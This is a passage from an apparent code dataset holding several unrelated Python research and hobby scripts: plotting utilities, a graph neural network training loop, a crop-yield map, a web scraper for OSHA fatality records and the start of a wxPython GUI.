loss_results[key]\n if labs is not None:\n lab = labs[i][j]\n print(lab)\n else:\n lab = r.label\n lltsavg = plt.plot(np.arange(1,r.problem.T+1), r.regs_norate['tsavg'][0], linewidth=2.0, \n linestyle=loss_styles[i], color=colors[j], label=lab, rasterized=True)\n plt.fill_between(np.arange(1,r.problem.T+1), r.regs_norate['tavg_perc_10'][0], r.regs_norate['tavg_perc_90'][0], \n linestyle=loss_styles[i], color=colors[j], alpha=0.1, rasterized=True)\n if bounds:\n try:\n plt.plot(np.arange(1,r.problem.T+1), r.regs_norate['tsavgbnd'][0], \n color=colors[j], linewidth=3, rasterized=True) \n except IndexError: pass \n # make plots pretty and show legend\n plt.yscale('log'), plt.xscale('log')\n plt.legend(prop={'size':12}, frameon=False, **kwargs) #loc='lower center', \n if directory:\n os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory, list(results[0].values())[0].problem.desc, \n list(results[0].values())[0].problem.lossfuncs[0].desc)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n \n\ndef plot_snapshots(results, times, filename=None, show=False, **kwargs):\n \"\"\" Creates a sequence of plots from the pltdata array in the results at the\n time steps specified in times (will be ordered increasing). \n Here results is an iterable of results. 
The resulting figure will have \n len(results) x len(times) plots. \"\"\"\n pltpoints = results[0].problem.pltpoints\n fig = plt.figure(figsize=kwargs.get('figsize'))\n # idk why the FUCK this does not work just using np arrays!?\n zmax = np.max([np.max([np.max([np.max(df) for df in dflat]) for dflat in result.pltdata]) for result in results])\n zmin = np.min([np.min([np.min([np.min(df) for df in dflat]) for dflat in result.pltdata]) for result in results])\n for i,result in enumerate(results):\n bbox = result.problem.domain.bbox()\n for j,time in enumerate(np.sort(times)):\n ax = fig.add_subplot(len(results), len(times), len(times)*i+j+1, projection='3d')\n for points,dat in zip(pltpoints, result.pltdata[time]):\n ax.plot_trisurf(points[:,0], points[:,1], dat, cmap=plt.get_cmap('jet'), \n linewidth=0, vmin=zmin, vmax=zmax)\n # Setting the axes properties\n ax.set_xlim3d(bbox.bounds[0])\n ax.set_xlabel('$s_1$')\n ax.set_ylim3d(bbox.bounds[1])\n ax.set_ylabel('$s_2$')\n ax.set_zlim3d([-0.1, zmax])\n ax.set_zlabel('$x$')\n ax.set_title('t={}'.format(time))\n ax.w_xaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.w_yaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.w_zaxis.set_pane_color((1.0, 1.0, 1.0, 1.0))\n ax.view_init(elev=kwargs.get('elev'), azim=kwargs.get('azim'))\n plt.tight_layout()\n# if directory:\n# os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation \n# filename = '{}{}_{}_'.format(directory, results[0].problem.desc, \n# results[0].problem.lossfuncs[0].desc)\n# plt.savefig(filename + 'snapshots.pdf', bbox_inches='tight', dpi=300)\n if filename is not None:\n plt.savefig(filename, bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n\n\ndef save_results(results, directory):\n \"\"\" Serializes a results object for persistent storage using the pickle module. 
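Also writes the empirical and bound regret slopes to a companion .txt\n    file and deletes bulky plotting data from each problem before pickling. 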
\"\"\" \n os.makedirs(directory, exist_ok=True) # this could probably use a safer implementation\n slope_txt = []\n for result in results:\n try:\n [slope_txt.append('{}, Empirical: {}\\n'.format(result.label, val[0])) for val in result.slopes.values()]\n [slope_txt.append('{}, Bounds: {}\\n'.format(result.label, val[0])) for val in result.slopes_bnd.values()] \n del result.problem.pltpoints, result.problem.data\n except (AttributeError, IndexError):\n pass\n slopes_name = '{}{}_{}_slopes.txt'.format(directory, results[0].problem.desc, \n results[0].problem.lossfuncs[0].desc)\n with open(slopes_name, 'w') as f:\n f.writelines(slope_txt)\n pigglname = '{}{}_{}.piggl'.format(directory, results[0].problem.desc, \n results[0].problem.lossfuncs[0].desc) \n with open(pigglname, 'wb') as f:\n pickle.dump(results, f, pickle.HIGHEST_PROTOCOL) \n\n\ndef visualize_potentials(potentials, xlim=(-1,5), **kwargs):\n u = np.linspace(xlim[0], xlim[1], 1000)\n plt.figure(figsize=kwargs.get('figsize'))\n labels = kwargs.get('labels')\n if labels is None:\n labels = [pot.desc for pot in potentials]\n if kwargs.get('semilogy') == True:\n for vals,label in zip([pot.phi(u) for pot in potentials], labels):\n plt.semilogy(u, 1+vals, label=label)\n else:\n for vals,label in zip([pot.phi(u) for pot in potentials], labels):\n plt.plot(u, vals, label=label, linewidth=2)\n plt.ylim(kwargs.get('ylim'))\n plt.xlabel('$u$', fontsize=15)\n plt.ylabel('$\\phi(u)$', fontsize=15)\n plt.legend(loc=kwargs.get('loc'), frameon=False)\n plt.title('Various $\\omega$-potentials')\n plt.tight_layout()\n if kwargs.get('filename') is not None:\n plt.savefig(kwargs.get('filename'), bbox_inches='tight', dpi=300)\n if kwargs.get('show') is not False:\n plt.show()\n plt.close()\n \n \ndef circular_tour(domain, N):\n \"\"\" Returns a sequence of N points that wander around in a circle\n in the domain. Used for understanding various learning rates. 
\"\"\"\n if domain.n != 2:\n raise Exception('For now circular_tour only works in dimension 2')\n if isinstance(domain, nBox):\n center = np.array([0.5*(bnd[0]+bnd[1]) for bnd in domain.bounds])\n halfaxes = np.array([0.75*0.5*(bnd[1]-bnd[0]) for bnd in domain.bounds])\n return np.array([center[0] + halfaxes[0]*np.cos(np.linspace(0,2*np.pi,N)), \n center[1] + halfaxes[1]*np.sin(np.linspace(0,2*np.pi,N))]).T \n if isinstance(domain, DifferenceOfnBoxes) and (len(domain.inner) == 1):\n lengths = [bound[1] - bound[0] for bound in domain.outer.bounds]\n weights = np.array(lengths*2)/2/np.sum(lengths)\n bnds_inner, bnds_outer = domain.inner[0].bounds, domain.outer.bounds\n xs = np.concatenate([np.linspace(0.5*(bnds_inner[0][0]+bnds_outer[0][0]), 0.5*(bnds_inner[0][1]+bnds_outer[0][1]), weights[0]*N),\n 0.5*(bnds_outer[0][1]+bnds_inner[0][1])*np.ones(weights[1]*N),\n np.linspace(0.5*(bnds_inner[0][1]+bnds_outer[0][1]), 0.5*(bnds_inner[0][0]+bnds_outer[0][0]), weights[2]*N),\n 0.5*(bnds_outer[0][0]+bnds_inner[0][0])*np.ones(weights[3]*N)])\n ys = np.concatenate([0.5*(bnds_outer[1][0]+bnds_inner[1][0])*np.ones(weights[0]*N),\n np.linspace(0.5*(bnds_outer[1][0]+bnds_inner[1][0]), 0.5*(bnds_inner[1][1]+bnds_outer[1][1]), weights[1]*N),\n 0.5*(bnds_outer[1][1]+bnds_inner[1][1])*np.ones(weights[2]*N),\n np.linspace(0.5*(bnds_inner[1][1]+bnds_outer[1][1]), 0.5*(bnds_inner[1][0]+bnds_outer[1][0]), weights[3]*N)])\n return np.array([xs, ys]).T\n else:\n raise Exception('For now circular_tour only works on nBoxes and the difference of 2 nBoxes')\n \ndef quicksample(bounds, A, eta):\n \"\"\" Function returning actions sampled from the solution of the Dual Averaging \n update on an Box with Affine losses, Exponential Potential. \"\"\"\n C1, C2 = np.exp(-eta*A*bounds[:,0]), np.exp(-eta*A*bounds[:,1])\n Finv = lambda U: -np.log(C1 - (C1-C2)*U)/A/eta\n np.random.seed()\n return Finv(np.random.rand(*A.shape))\n\ndef CNR_worker(prob, *args, **kwargs):\n \"\"\" Helper function for wrapping class methods to allow for easy \n use of the multiprocessing package for parallel computing \"\"\"\n return prob.run_simulation(*args, **kwargs)\n\n","sub_path":"ContNoRegret/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":23773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"5795236","text":"\"\"\"\nSIGN model application\nauthor: Yixin Su\n\"\"\"\nimport tensorflow as tf\nimport argparse\nfrom model_SIGN import SIGN\nimport LoadData_SIGN as DATA\nfrom sklearn.metrics import roc_auc_score\nimport pickle\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--path', nargs='?', default='../data/',\n help='Input data path.')\n parser.add_argument('--dataset', nargs='?', default='twitter',\n help='Choose a dataset.')\n parser.add_argument('--dataset_type', type=int, default=0,\n help='which kind of dataset: 0: graph based dataset; 1: FM based dataset')\n parser.add_argument('--epoch', type=int, default=50,\n help='Number of epochs.')\n parser.add_argument('--batch_size', type=int, default=512,\n help='Batch size.')\n parser.add_argument('--hidden_factor', type=int, default=8,\n help='Number of hidden factors.')\n parser.add_argument('--mlp_layers', nargs='?', default='[32]',\n help=\"Size of each mlp layer.\")\n parser.add_argument('--num_class', type=int, default=2,\n help='Number of graph classes.')\n parser.add_argument('--keep_prob', type=float, default=0.5, \n help='dropout ratio')\n parser.add_argument('--lr', 
type=float, default=0.05,\n                        help='Learning rate.')\n    parser.add_argument('--lambda_l0', type=float, default=0.01,\n                        help='lambda for l0 regularization.')\n    parser.add_argument('--lambda_l2', type=float, default=0.01,\n                        help='lambda for l2 regularization on node embedding.')\n    parser.add_argument('--lambda_upd', type=float, default=0.05,\n                        help='lambda for l2 regularization on node embedding.')\n    parser.add_argument('--reverse_rate', type=float, default=0.0,\n                        help='reverse rate')\n    parser.add_argument('--l0_para', nargs='?', default='[0.66, -0.1, 1.1]',\n                        help=\"l0 parameters, which are beta (temperature), \\\n                        zeta (interval_min) and gamma (interval_max).\")\n    parser.add_argument('--predict_edge', type=int, default=1,\n                        help='0: use true edge (if any); 1: predict edge use L0 norm; 2: use full edge ')\n    parser.add_argument('--test_ratio', type=float, default=0.1,\n                        help='ratio of true edges that are used to evaluate link prediction')\n    parser.add_argument('--fast_test', type=int, default=0,\n                        help='Whether to perform fast test (Valid-Test) or not (Train-Valid) (0 or 1)')\n    \n    return parser.parse_args()\n\n\ndef generate_feed_data(data_dict, batch_size, datatype, pred_edge=True):\n    node_list = data_dict['nodes']\n    sender_ori = data_dict['sender']\n    receiver_ori = data_dict['receiver']\n    full_edge_label_ori = data_dict['full_edge_label']\n    num_data = len(receiver_ori)\n    edge_num_list = [len(sl) for sl in sender_ori]\n    node_num_list = [len(nl) for nl in node_list]\n    segment_ids = []\n    node_index = []\n    node_id_list = []\n    sender = []\n    receiver = []\n    full_edge_label = []\n    labels = []\n    total_edge_num = []\n    \n    ind = 0\n    while ind < num_data:\n        current_sender_ori = sender_ori[ind:(ind+batch_size)]\n        current_receiver_ori = receiver_ori[ind:(ind+batch_size)]\n        current_full_edge_label_ori = full_edge_label_ori[ind:(ind+batch_size)]\n        current_segement_ids = []\n        current_node_index = []\n        current_edge_num_list = edge_num_list[ind:(ind+batch_size)]\n        current_node_num_list = node_num_list[ind:(ind+batch_size)]\n        current_node_list = []\n        current_node_list_list = node_list[ind:(ind+batch_size)]\n        for nl in current_node_list_list:\n            current_node_list += nl\n\n        \n        total_edge_num.append(sum([len(g_e) for g_e in current_sender_ori]))\n        \n        for i in range(len(current_edge_num_list)):\n            current_segement_ids += [i for j in range(current_edge_num_list[i])]\n        for i in range(len(current_node_num_list)):\n            current_node_index += [i for j in range(current_node_num_list[i])]\n        \n        current_sender = []\n        current_receiver = []\n        current_full_edge_label = []\n        \n        for i in range(len(current_sender_ori)):\n            current_sender += current_sender_ori[i]\n            current_receiver += current_receiver_ori[i]\n            current_full_edge_label += current_full_edge_label_ori[i]\n\n        \n        labels.append(data_dict['label'][ind:(ind+batch_size)])\n        sender.append(current_sender)\n        receiver.append(current_receiver)\n        full_edge_label.append(current_full_edge_label)\n        segment_ids.append(current_segement_ids)\n        node_index.append(current_node_index)\n        node_id_list.append(current_node_list)\n        \n        ind += batch_size\n    \n    return sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num\n\n\nif __name__ == '__main__':\n    args = parse_args()\n    \n    # Announce the configuration\n    print(\"Verbose: \\n\\tDataset: %s \\n\\tPredict Edge: %d \\n\\tHidden Factor: %d \\n\\tmlp layer: %s \\n\\\n          Learning rate: %.4f \\n\\tBatch size: %d \\n\\tEpoch: %d \\n\\tlambda (l0, l2, upd) %s \\n\\\n          L_0 parameter (if predict edge): %s \\n\\tReverse Rate: %s 
\\n\\tFast test: %d\" % (args.dataset, \n args.predict_edge, args.hidden_factor, args.mlp_layers, args.lr,\n args.batch_size, args.epoch, str([args.lambda_l0, args.lambda_l2,\n args.lambda_upd]), args.l0_para, args.reverse_rate, args.fast_test))\n \n \n data = DATA.LoadData(args.path, args.dataset, predict_edge=args.predict_edge)\n\n num_node = data.node_num\n print(\"Node No: %d\" %(num_node))\n\n model = SIGN(\n num_node, \n args.hidden_factor, \n args.num_class,\n lamda_l0=args.lambda_l0, \n lamda_l2=args.lambda_l2,\n lamda_upd=args.lambda_upd,\n l0_para = eval(args.l0_para),\n dropout=args.keep_prob,\n mlp_layer=eval(args.mlp_layers),\n pred_edges=args.predict_edge,\n reverse_edge_rate=args.reverse_rate)\n\n loss_t, loss_l0, loss_l2 = model.get_loss()\n optimizer = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_t)\n train_op_t = optimizer\n optimizer_l0 = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_l0)\n train_op_l0 = optimizer_l0\n optimizer_l2 = tf.compat.v1.train.AdagradOptimizer(\n learning_rate = args.lr, \n initial_accumulator_value=1e-8\n ).minimize(loss_l2)\n train_op_l2 = optimizer_l2\n\n if args.fast_test == 0:\n sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num = \\\n generate_feed_data(data.train_data, args.batch_size, args.dataset_type)\n sender_valid, receiver_valid, full_edge_label_valid, segment_ids_valid, node_index_valid, node_id_list_valid, labels_valid, total_edge_num_valid = \\\n generate_feed_data(data.test_data, len(data.test_data['sender']), args.dataset_type)\n else:\n sender, receiver, full_edge_label, segment_ids, node_index, node_id_list, labels, total_edge_num = \\\n generate_feed_data(data.valid_data, args.batch_size, args.dataset_type)\n sender_valid, receiver_valid, full_edge_label_valid, segment_ids_valid, node_index_valid, node_id_list_valid, labels_valid, total_edge_num_valid = \\\n generate_feed_data(data.test_data, len(data.test_data['sender']), args.dataset_type)\n \n with tf.Session() as sess:\n init_g = tf.global_variables_initializer()\n init_l = tf.local_variables_initializer()\n sess.run(init_g)\n sess.run(init_l)\n\n num_edges_pic = []\n auc_pic = []\n acc_pic =[]\n\n for ep in range(args.epoch):\n train_loss = []\n for round_num in range(len(labels)):\n feed_dict = {}\n feed_dict[model.senders_ph] = sender[round_num]\n feed_dict[model.receivers_ph] = receiver[round_num]\n feed_dict[model.segment_ids] = segment_ids[round_num]\n feed_dict[model.graph_index_ph] = node_index[round_num]\n feed_dict[model.graph_node_id_ph] = node_id_list[round_num]\n feed_dict[model.labels] = labels[round_num]\n feed_dict[model.num_data] = len(labels[round_num])\n feed_dict[model.epoch] = [ep]\n feed_dict[model.is_training] = True \n if args.predict_edge == 0 or args.predict_edge == 1:\n feed_dict[model.true_edge] = full_edge_label[round_num]\n\n _, train_base_loss = sess.run([train_op_t, model.base_loss], feed_dict=feed_dict)\n train_loss.append(train_base_loss)\n \n feed_dict = {}\n feed_dict[model.senders_ph] = sender_valid[0]\n feed_dict[model.receivers_ph] = receiver_valid[0]\n feed_dict[model.segment_ids] = segment_ids_valid[0]\n feed_dict[model.graph_index_ph] = node_index_valid[0]\n feed_dict[model.graph_node_id_ph] = node_id_list_valid[0]\n feed_dict[model.labels] = labels_valid[0]\n feed_dict[model.num_data] = len(labels_valid[0])\n feed_dict[model.epoch] = [1]\n 
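# evaluation feed: training-only behaviour (e.g. dropout) is switched off below\n            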
feed_dict[model.is_training] = False \n if args.predict_edge == 0 or args.predict_edge == 1:\n feed_dict[model.true_edge] = full_edge_label_valid[0]\n\n if args.dataset_type == 0 and args.predict_edge == 1:\n _loss, l2, l0, num_edges, _accuracy, _class_auc, _g_S, edge_acc, update_node_emb = sess.run(\n [model.base_loss, model.l2_loss, model.l0_loss, model.num_edges,\n model.class_accuracy, model.class_auc, model.loc, model.edge_auc, model.update_node_emb], \n feed_dict=feed_dict)\n \n print(\"Epoch: %d, train_loss: %.5f, loss: %s, class_auc: %.5f, acc: %.5f, l2: %.5f, l0: %.5f, edge n: %d, edge_auc: %.5f\" %\n (ep, sum(train_loss)/len(train_loss), str(_loss), _class_auc[0], _accuracy, \\\n l2, l0, num_edges, edge_acc[0]))\n \n num_edges_pic.append(num_edges)\n auc_pic.append(_class_auc[0])\n acc_pic.append(_accuracy)\n if ep %50 == 0:\n pickle.dump((num_edges_pic, auc_pic, acc_pic), open('../store/{}/result_{}.pkl'.format(args.dataset, ep), 'wb'))\n \n else:\n _loss, base, l2, num_edges, _class_acc, _class_auc, _g_S, test = sess.run(\n [model.base_loss, model.base_loss, model.l2_loss, model.num_edges, model.class_accuracy,\\\n model.class_auc, model.g_S, model.softmax_g_out], \n feed_dict=feed_dict)\n \n print(\"Epoch: %d, class_auc: %.5f, acc: %.5f, loss: %.5f, base: %.5f, l2_norm: %.5f, edge n: %d\" %\n (ep, _class_auc[0], _class_acc, _loss, base, l2, num_edges))\n ","sub_path":"code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"473752473","text":"\ndef bounding_box(grid):\n xmin = min(x for x, _ in grid)\n xmax = max(x for x, _ in grid)\n ymin = min(y for _, y in grid)\n ymax = max(y for _, y in grid)\n return xmin, xmax + 1, ymin, ymax + 1\n\ndef draw(grid, bounds=None, X=None):\n if not grid:\n return\n xmin, xmax, ymin, ymax = bounds or bounding_box(grid)\n for y in range(ymin, ymax):\n for x in range(xmin, xmax):\n if (x, y) == X:\n character = 'X'\n else:\n character = grid.get((x, y), ' ')\n print(character, end='')\n print()\n","sub_path":"2019/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"598621908","text":"import numpy\nimport random\nimport math\nimport matplotlib.pyplot as plt\nfrom operator import add\nimport importlib.util\nspec = importlib.util.spec_from_file_location(\"Pokeboi.py\", \"C:/Users/W. 
Baker/OneDrive/Documents/GitHub/PokeBoiBot/PokeboiSeperated/Pokeboi.py\")\npb = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(pb)\n\n\n\nactionvalue=numpy.load(\"actionvalue.npy\")\n\nwinCounter=0\nbattleCounter=0\nwhile battleCounter<1000:\n\n pok11=pb.pokeboi(5,5,1)\n pok22=pb.pokeboi(5,5,1)\n \n pb.BattleWinnerAI(pok11,actionvalue,pok22,actionvalue)\n battleCounter+=1\n if pok11.HP>0:\n winCounter+=1\n#elif pok11.HP==0:\n# print(\"AI lost\")\nprint(winCounter/battleCounter*100)\nprint(pok11.moveHistoryTime[0:20])\nxT=numpy.linspace(0,pok11.battlenum,dtype=int)\ny1=pok11.moveHistoryTime[xT, 0]\ny2=pok11.moveHistoryTime[xT, 1]\ny3=pok11.moveHistoryTime[xT, 2]\n\nfig, (ax1,ax2,ax3) = plt.subplots(3,1)\nfig.suptitle(\"Move vs Time\")\n\nax1.plot(xT,y1)\nax1.set_ylabel(\"Kill\")\n\nax2.plot(xT,y2)\nax2.set_ylabel(\"Atk buff\")\n\nax3.plot(xT,y3)\nax3.set_ylabel(\"Def buff\")\n\nplt.show()","sub_path":"PokeboiSeperated/MarkovStratInq.py","file_name":"MarkovStratInq.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"497396379","text":"\"\"\"\nHere are the default parameters used in all the package\nThere are 1.path 2.filenames 3.learning parameters\n\"\"\"\nimport os\n\n#\n# ALL DEFAULT PATH\n#\n\nBASE_PATH = os.path.join('data/')\n\nDATA_PATH = os.path.join(BASE_PATH, 'set/')\nREDUCTED_DATA_PATH = os.path.join(BASE_PATH, 'reducted/')\nMODEL_PATH = os.path.join(BASE_PATH, 'models/')\nGRAPH_PATH = os.path.join(BASE_PATH, 'graph/')\n\n\n#\n# ALL DEFAULT FILENAME\n#\n\n# File containing data to be t-SNEed\nINPUT_FILE_BASE_NAME = 'preprocessed_inputs'\nRAW_NAME = 'originals'\n\n# default RN for predictions\nDEFAULT_PREDICTOR = 'adv_meta_23-08predict'\n\n# A version is a string added to the end of each filename\nVERSION = '_20170925'\n\n# data output name (labels)\nOUTPUT_NAME = 'account'\n\n\n#\n# ALL LEARNING PARAMETERS\n#\n\n# t-SNE parameters\n# best tuple so far is (50,1000,pca,15000)\nPARAMS_LEARNING = {\n 'perplexities' : [40,50,65,80],\n # roughly the number of neighbors in cluster\n # https://lvdmaaten.github.io/publications/papers/JMLR_2008.pdf\n # p4\n 'learning_rates': [800, 1000],\n 'inits' : ['random'], #deprecated, use pca_variance_needed instead\n 'n_iters' : [12000]\n }\n\n# t-SNE parameters for the reduced data we will draw\nPARAMS_VIZ = {\n 'perplexity' : 65,\n 'learning_rate': 1000,\n 'init' : 'random', #deprecated, use pca_variance_needed instead\n 'n_iter' : 12000,\n }\n\nPCA_MIN_VARIANCE = 0.9 # 90% of explained_variance in test case\n\n# 30 for OVH, 50 for local, 15 for epinal\nREDUCTION_SIZE_FACTOR = 1\n","sub_path":"vizuka/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"65499796","text":"\"\"\"General HUC12 mapper\"\"\"\nfrom __future__ import print_function\n\nimport datetime\nimport sys\n\nfrom pyiem.plot import MapPlot, nwsprecip\nfrom shapely.wkb import loads\nimport psycopg2\nimport numpy as np\nimport cartopy.crs as ccrs\nfrom matplotlib.patches import Polygon\nimport matplotlib.colors as mpcolors\n\n\ndef main(argv):\n \"\"\"Do Great Things\"\"\"\n year = int(argv[1])\n pgconn = psycopg2.connect(database='idep', host='localhost',\n port=5555, user='nobody')\n cursor = pgconn.cursor()\n\n mp = MapPlot(continentalcolor='white', nologo=True,\n sector='custom',\n south=36.8, north=45.0, west=-99.2, east=-88.9,\n 
subtitle='Assumes 56 lb test weight',\n title=('%s Corn Yield HUC12 Average'\n ) % (year, ))\n\n cursor.execute(\"\"\"\n with hucs as (\n select huc_12, ST_Transform(simple_geom, 4326) as geo\n from huc12),\n data as (\n SELECT huc12, avg(yield_kgm2) * 8921.8 / 56. as val from harvest\n where crop = 'Corn' and valid between %s and %s\n GROUP by huc12\n )\n\n SELECT geo, huc12, val from hucs h JOIN data d on (h.huc_12 = d.huc12)\n \"\"\", (datetime.date(year, 1, 1), datetime.date(year, 12, 31)))\n\n bins = np.arange(0, 310, 30)\n cmap = nwsprecip()\n cmap.set_under('white')\n cmap.set_over('black')\n norm = mpcolors.BoundaryNorm(bins, cmap.N)\n\n for row in cursor:\n polygon = loads(row[0].decode('hex'))\n arr = np.asarray(polygon.exterior)\n points = mp.ax.projection.transform_points(ccrs.Geodetic(),\n arr[:, 0], arr[:, 1])\n color = cmap(norm([float(row[2]), ]))[0]\n poly = Polygon(points[:, :2], fc=color, ec='None', zorder=2, lw=.1)\n mp.ax.add_patch(poly)\n\n mp.draw_colorbar(bins, cmap, norm, units='bu/acre')\n\n # mp.drawcounties()\n mp.postprocess(filename='test.png')\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"scripts/plots/huc12_map.py","file_name":"huc12_map.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"302541935","text":"from openpyxl import load_workbook\nimport requests\nfrom bs4 import BeautifulSoup\nimport sys\n\n\nfname = '../OHSA Fatality Data.xlsx'\n\nwb = load_workbook(filename=fname)\nsheet_ranges = wb['Sheet1']\n\ncol_pos = 2\nscan_count = 0\n\nfloop = True\nwhile floop==True:\n cur_value = sheet_ranges['e'+str(col_pos)].value\n \n sys.stdout.write(\"Scan count: %d \\r\" % (col_pos))\n sys.stdout.flush()\n\n if sheet_ranges['H'+str(col_pos)].value != None and sheet_ranges['J'+str(col_pos)].value != None:\n col_pos = col_pos + 1\n continue\n\n if cur_value == None:\n floop = False\n else:\n cur_link = sheet_ranges['e'+str(col_pos)].hyperlink.display\n page = requests.get(cur_link)\n\n soup = BeautifulSoup(page.content, 'html.parser')\n results = soup.find(id=\"maincontain\")\n\n elem = results.find('table', class_='tablei_100 table-borderedi_100')\n try:\n elems = elem.find_all('tr')\n except Exception as inst:\n sys.stdout.write(\"\\n\")\n print(inst)\n col_pos = col_pos + 1\n continue\n \n item = elems[2].find('td')\n \n try:\n sheet_ranges['h'+str(col_pos)].value = item.text\n except Exception as inst:\n print(\"\\n IllegalCharacterError\")\n\n try:\n item = elems[3].find('td')\n keywords = item.text.replace(item.find('strong').text, \"\")\n sheet_ranges['j'+str(col_pos)].value = keywords\n except Exception as inst:\n print(\"\")\n \n try:\n items = elems[5].find_all('td')\n sheet_ranges['i'+str(col_pos)].value = items[6].text\n except Exception as inst:\n print(\"\")\n\n scan_count = scan_count + 1\n if scan_count == 20:\n wb.save(filename=fname)\n scan_count = 0\n \n \n\n col_pos = col_pos + 1\n\nsys.stdout.write(\"\\n\")\n \nwb.save(filename=fname)\n\nprint(\"Successfully completed!\")\nexit()\n\n\n\n\n\n# table-responsive\n#tablei_100 table-borderedi_100\n#tbody h 3rd tr thumbnail\n# j 4th tr Keywords:...\n# i 6th tr Occupation 7th td","sub_path":"openpyxl-branch-3.0/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"341005909","text":"import os, sys\r\nimport wx\r\nimport wx.lib.agw.multidirdialog as MDD\r\nimport 
pandas as pd\r\nimport numpy as np\r\nfrom math import sin, cos, asin, sqrt, degrees, radians\r\nimport time\r\n\r\n\r\n#Global Variable Declaration\r\n#directory --> \"Upload File..\"\r\ndirectory=\"\"\r\n#file stores the file name selected coresponding to directory\r\nfile=\"\"\r\n#parameter_oprx stores the selected spectrum of operator-x \r\nparameter_opr1=[]\r\nparameter_opr2=[]\r\n\r\n# mean, max, standard deviation,limit of the spectrum\r\nmean=[]\r\nmaximum=[]\r\nsd=[]\r\nlimit=[]\r\nlsti=[]\r\nlstv=[]\r\n\r\n\r\n\r\nEarth_radius_km = 6371.0\r\nRADIUS = Earth_radius_km\r\nwildcard = \"Excel Sheet (*.xlsx)|*.xlsx|\" \\\r\n \"All files (*.*)|*.*\"\r\n \r\n#MyForm class calls the Framework \r\nclass MyForm(wx.Frame):\r\n \r\n def __init__(self):\r\n wx.Frame.__init__(self, None, wx.ID_ANY, title='Nokia',size=wx.Size(450, 100))\r\n \r\n # Add a panel so it looks correct on all platforms\r\n self.panel = wx.Panel(self, wx.ID_ANY)\r\n self.currentDirectory = os.getcwd()\r\n\r\n#Defining componentes of Framework i.e., the buttons,TextBox,Static Text\r\n bmp = wx.ArtProvider.GetBitmap(wx.ART_INFORMATION, wx.ART_OTHER, (16, 16))\r\n titleIco = wx.StaticBitmap(self.panel, wx.ID_ANY, bmp)\r\n title = wx.StaticText(self.panel, wx.ID_ANY, 'Frame-Work Info')\r\n\r\n title1 = wx.StaticText(self.panel, wx.ID_ANY, 'Upload Site Data Sheet')\r\n openFileDlgBtn = wx.Button(self.panel, label=\"Upload File..\")\r\n openFileDlgBtn.Bind(wx.EVT_BUTTON, self.onOpenFile)\r\n\r\n para1 = wx.StaticText(self.panel, wx.ID_ANY, 'Operator-1: Parameter')\r\n para2 = wx.StaticText(self.panel, wx.ID_ANY, 'Operator-2: Parameter')\r\n\r\n mylist=['2G-Payload','3G-Payload','4G-Payload']\r\n self.box1=wx.ListBox(self.panel,-1,(20,20),(100,100),mylist,wx.LB_MULTIPLE)\r\n self.box1.Bind(wx.EVT_LISTBOX, self.on_click1,self.box1)\r\n\r\n self.box2=wx.ListBox(self.panel,-1,(20,20),(100,100),mylist,wx.LB_MULTIPLE)\r\n self.box2.Bind(wx.EVT_LISTBOX, self.on_click2,self.box2)\r\n \r\n title2 = wx.StaticText(self.panel, wx.ID_ANY, 'Create Excel File of Colocation Pair')\r\n okBtn2 = wx.Button(self.panel, label=\"Create File\")\r\n okBtn2.Bind(wx.EVT_BUTTON, self.onCreate)\r\n\r\n title3 = wx.StaticText(self.panel, wx.ID_ANY, 'Generate Capacity Analysis Excel Sheet')\r\n okBtn = wx.Button(self.panel, wx.ID_ANY, 'OK')\r\n cancelBtn = wx.Button(self.panel, wx.ID_ANY, 'Cancel')\r\n self.Bind(wx.EVT_BUTTON, self.onOK, okBtn)\r\n self.Bind(wx.EVT_BUTTON, self.onCancel, cancelBtn)\r\n \r\n #Putting components into BoxSizer which is basically a layout\r\n topSizer = wx.BoxSizer(wx.VERTICAL)\r\n titleSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n uploadSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n paratextSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n coloSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n paraSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n btnSizer = wx.BoxSizer(wx.HORIZONTAL)\r\n \r\n #Adding Corresponding Component to there boxes\r\n titleSizer.Add(title, 0, wx.ALL, 5)\r\n titleSizer.Add(titleIco, 0, wx.ALL, 5)\r\n \r\n \r\n uploadSizer.Add(title1, 0, wx.ALL, 5)\r\n uploadSizer.Add(openFileDlgBtn, 0, wx.ALL, 5)\r\n\r\n coloSizer.Add(title2, 0, wx.ALL, 5)\r\n coloSizer.Add(okBtn2, 0, wx.ALL, 